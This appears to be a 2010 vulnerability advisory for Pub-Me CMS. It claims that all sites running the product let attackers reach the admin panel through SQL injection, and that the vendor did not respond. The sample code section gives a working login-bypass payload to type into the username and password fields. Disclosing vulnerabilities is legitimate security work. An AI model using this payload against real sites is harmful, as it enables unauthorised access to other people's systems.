_______ _____ ___
| | | | |.' _|
| |__ | _|
|___|___| |__||__|
Pub-Me CMS Blind SQL Injection Vulnerability
Name: Pub-Me CMS
Vendor: http://www.pub-me.com/
Versions Affected: //unknown, all current affected - devel. homepage & 33 clients web pages
Software Link: Not aviable, Demo can be requested by e-mail from vendor
Found by: H4f, <Sec was born project, Anonymous submission>
Contact: zotrob [at] gmail [dot] com
Date: 2010-10-25
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
Pub-Me Content Managment System is designed to make it possible for you to pay full
attention to the content without having to bother about technologies.
II. DESCRIPTION
_______________
NOT properly sanitised form before being used
in a SQL query.
III. ANALYSIS
_____________
Summary:
All Pub-Me based websites are vulnerable, any more/less trained monkey can reach admin panel.
______________________
IV. SAMPLE CODE
_______________
Blind SQL Injection
Login> ' or 0=0 #
Pass> ' or 0=0 #
V. FIX
______
Vedor contacted, no reponse.
